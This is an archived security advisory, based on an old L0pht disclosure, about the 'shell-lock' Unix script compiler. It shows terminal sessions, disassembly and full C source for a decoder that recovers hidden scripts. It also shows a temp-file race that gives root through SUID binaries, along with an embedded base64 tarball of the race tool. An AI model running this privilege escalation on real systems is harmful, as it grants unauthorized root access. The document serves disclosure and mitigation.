Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Unix :: General :: slock-1.htm

Shell-lock analysis



Vulnerability

    shell-lock

Affected

    Those running shell-lock (available for all UNIX platforms)

Description

    Following is  based on  L0pht Security  Advisory.   (a) A  trivial
    encoding mechanism is used for  obfuscating the shell code in  the
    "compiled" binary.   Anyone with read  permissions to the  file in
    question can decode and retrieve the original shell code.  Another
    vulnerability exists  where the  user can  retrieve the un-encoded
    shell script without needing to actually decode the binary.

    (b) The vendors  claim the program  to be useful  in creating SUID
    binaries on systems that do not honor SUID shell scripts and  also
    to protect against the security problems with SUID shell  scripts.
    As it  turns out  any shell-lock  "compiled" program  that is SUID
    root  will  allow  any  user  to  execute  any  program  with root
    privileges.

    Example (a'):

        [slaughter-house] cat q.sh
        #!/bin/sh
        echo "hi there... this is a test"

        [slaughter-house] shell-lock -o q q.sh

                         SHELL-LOCK(tm)
                  Shell Script Security Software
                     Copyright (C) 1989-1999
                    Cactus International, Inc.
                 (Version:  2.1.1.1        7/19/99)

        Converting files:  q.sh

        Compiling.....DEMO Version...
        Success!!

        The shell script "q" has been compiled and placed in "q"
        Conversion successful!!

        [slaughter-house] file q
        q:     ELF 32-bit MSB executable SPARC Version 1, dynamically linked, stripped

        [slaughter-house] ./q
        hi there... this is a test

        [slaughter-house] strings ./q
        (some stuff... not the ascii from the shell script)

        [slaughter-house] ./codem -d -i ./q
        #!/bin/sh
        rm -f $0 2>/dev/null
        echo "hi there... this is a test"

    Example (a''):

        [slaughter-house] temp-watch -d /var/tmp -C 'q*' -D ./ &
        [1] 22971
        [slaughter-house] nice +10 ./q
        hi there... this is a test
        [slaughter-house] more q*
        #!/bin/sh
        rm -f $0 2>/dev/null
        echo "hi there... this is a test"

    Example (b):

        # ls -l q
        -rwxr-xr-x   1 mudge    other      50753 Sep 28 14:24 q
        # chown root q
        # chmod 4755 q
        # exit
        [slaughter-house] id
        uid=789(mudge) gid=1(other)
        [slaughter-house] ls -l q
        -rwsr-xr-x   1 root     other      50753 Sep 28 14:24 q
        [slaughter-house] temp-watch -X '^q*' -R /bin/sh -d /var/tmp &
        [1] 23071
        [slaughter-house] nice +10 ./q
        # id
        uid=0(root) gid=1(other)

    So, what's shell-lock?  Have you ever seen the big  advertisements
    run in the back of SysAdmin magazine. You know, the ones with  the
    Texan with  the huge  hat and  sunglasses?   Well, that  is Cactus
    software.  The program "shell-lock" is used to create ELF binaries
    from shell scripts.   Ostensibly called a  Shell Script  Compiler,
    the literature  states that  the program  also hides  the original
    shell code so as not  to be returnable through running  strings(1)
    on the binary.

    A  quick  decompilation  shows  that  the  encoding  and  decoding
    routines look as follows:

    0x16194 :     inc  %i4                      Increment the counter
    0x16198 :     srl  %i4, 0x1f, %o0          {
    0x1619c :     add  %i4, %o0, %o0           { testing for odd v even
    0x161a0 :     andn  %o0, 1, %o0            {
    0x161a4 :     cmp  %i4, %o0                {
    0x161a8 :     bne  0x161b8       If they match
    0x161ac :     add  %o1, 0x63, %o2          add 0x63 to the value
    0x161b0 :     b  0x161c0        else
    0x161b4 :     ld  [ %i1 ], %o0
    0x161b8 :     add  %o1, 0x44, %o2          add 0x44 to the value
    0x161bc :     ld  [ %i1 ], %o0
    0x161c0 :    deccc  %o0
    0x161c4 :    bneg  0x16228
    0x161c8 :    st  %o0, [ %i1 ]
    0x161cc :    ld  [ %i1 + 4 ], %o0
    0x161d0 :    add  %o0, 1, %o1
    0x161d4 :    st  %o1, [ %i1 + 4 ]
    0x161d8 :    and  %o2, 0xff, %o1          and with 0xff (hey it's
    0x161dc :    stb  %o1, [ %o0 ]            ascii printable after all)
    0x161e0 :    ld  [ %i0 ], %o0
    0x161e4 :    deccc  %o0

    This basically boils down to the following C code snippit.

    for (i=0; i < strlen ; i++){
        if (!(i % 2))
          outbuff[i] = (inbuff[i] + 0x44) & 0xff;
        else
          outbuff[i] = (inbuff[i] + 0x63) & 0xff;
    }

    Conversely the decoding subtracts 0x44 and 0x63 alternately.  What
    shell-lock  does  when  it  creates  the initial "compiled" binary
    from the shell script is to add the line "rm -f $0 2>/dev/null" to
    the    bourne    shell    script     (or    "unlink    $ZERO     ;
    $ZERO=ENV{'X0'};\n.\nw\nq"  for  a  perl  script)  and encodes the
    entire  file.  This  is  then  copied  into  the data section of a
    skeleton binary file.  The binary file, upon execution, reads  the
    encoded  data  section  and  writes  it  out  to  a temporary file
    (*note:  the  default location is  /var/tmp though it  will follow
    the  TMPDIR  variable)  and  then  execve's  /bin/sh  to  call the
    program.

    The  first  method  of  extracting  the  data  comes  in using the
    attached  program  to  read  the  binary  and run the data section
    through the decoding routine.

    The second method of extraction  is to use the current  version of
    temp-watch (available  freely from  the L0pht  advisories site) to
    make a copy  of the temporary  file containing the  original shell
    code that is created when the binary is run.

    The  SUID  root  vulnerability  lies  in  the  fact that while the
    temporary file  is created  without any  special permissions,  the
    file exec'ing it is  running as root.   Thus, as soon as  one sees
    the temporary file  the race condition  exists where the  user can
    unlink the file and replace it with a different file or a  symlink
    to the program  wishing to be  executed.  This  is accomplished in
    the  above  example  with  the  program temp-watch using arguments
    specifying the replacement  of the temporary  file with a  link to
    /bin/sh.  Code follows.  temp-watch can be found at

        http://www.l0pht.com/advisories/l0pht-watch.tar.gz

    Below you'll find that mimed and codem after that.

    ---
    Content-Type: application/octet-stream; name="slock.tgz"
    Content-Transfer-Encoding: base64
    Content-Disposition: inline; filename="slock.tgz"
    Content-MD5: t3S/3D5mpdTMzHiMH1lhWA==
    
    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
    0W/5+TLQAH4AAA==
    
    -----

    And now codem:

    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/types.h>
    #include <unistd.h>
    #include <sys/stat.h>
    #include <fcntl.h>
    #include <string.h>
    
    void usage(char *);
    
    int main(int argc, char *argv[]){
      int fdin, fdout;
      int strlen, i, c;
      int cryptFlag=0, decryptFlag=0,seekFlag=0;
      int seekOffset=50688;
      char *infile=NULL, *outfile=NULL;
      char inbuff[8192];
      char outbuff[8192];
    
    
      while ((c = getopt(argc, argv, "cdhi:o:s:")) != EOF){
        switch (c) {
          case 'c':
            cryptFlag++;
            break;
          case 'd':
            decryptFlag++;
            break;
          case 'i':
            infile = optarg;
            break;
          case 'o':
            outfile = optarg;
            break;
          case 's':
            seekOffset = atoi(optarg);
            break;
          case 'h':
            usage(argv[0]);
            break;
          default:
            usage(argv[0]);
            break;
        }
      }
    
      if ((cryptFlag && decryptFlag) || (!cryptFlag && !decryptFlag)){
        printf("Must specify either -c or -d but not both\n");
        usage(argv[0]);
      }
    
      if (infile){
        fdin = open(infile, O_RDONLY);
        if (fdin == -1){
          perror("open infile");
        }
      } else {
        fdin = STDIN_FILENO;
      }
    
      if (outfile){
        fdout = open(outfile, O_WRONLY|O_CREAT|O_EXCL, 0644);
        if (fdout == -1){
          perror("open outfiel");
        }
      } else {
        fdout = STDOUT_FILENO;
      }
    
      memset(inbuff, '\0', sizeof(inbuff));
      memset(outbuff, '\0', sizeof(outbuff));
    
      if (decryptFlag)
        lseek(fdin, seekOffset, SEEK_SET);
    
      while ((strlen = read(fdin, inbuff, sizeof(inbuff))) != 0){
    
        for (i=0; i < strlen ; i++){
          if (cryptFlag){
            if (!(i % 2))
              outbuff[i] = (inbuff[i] + 0x44) & 0xff;
            else
              outbuff[i] = (inbuff[i] + 0x63) & 0xff;
          } else {
            if (!(i % 2))
              outbuff[i] = inbuff[i] - 0x44;
            else
              outbuff[i] = inbuff[i] - 0x63;
          }
        }
    
        write(fdout, outbuff, strlen);
      }
    
      close(fdin);
      close(fdout);
    
      return(0);
    }
    
    void usage(char *progname){
    
      char *c;
    
      c = strrchr(progname, '/');
      if (c)
        c++;
      else
        c = progname;
    
      printf("Usage: %s -cd[h] [-i infile] [-o outfile] [-s seek] \n", c);
      printf("  Shell-lock {en,de}coder by mudge@l0pht.com and _lumpy\n");
      printf("    -c  encrypt\n");
      printf("    -d  decrypt\n");
      printf("    -h  help\n");
      printf("    -i <file> input file\n");
      printf("    -o <file> output file\n");
      printf("    -s <offset> seed offset [defaults to 50688]\n");
      exit(1);
    }

Solution

    Do  not  take  candy  or  accept  car  rides  from  strangers.  If
    something seems too  good to be  true it probably  is.  There  are
    few magic solutions that negate  having to do things right  in the
    first place.

    If you need a shell  script to run with root  priveledges consider
    writing it in C or using something like sudo.

    Do not rely upon shell-lock as an obfuscation mechanism for hiding
    the internals of shell scripts in 'compiled' binaries.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH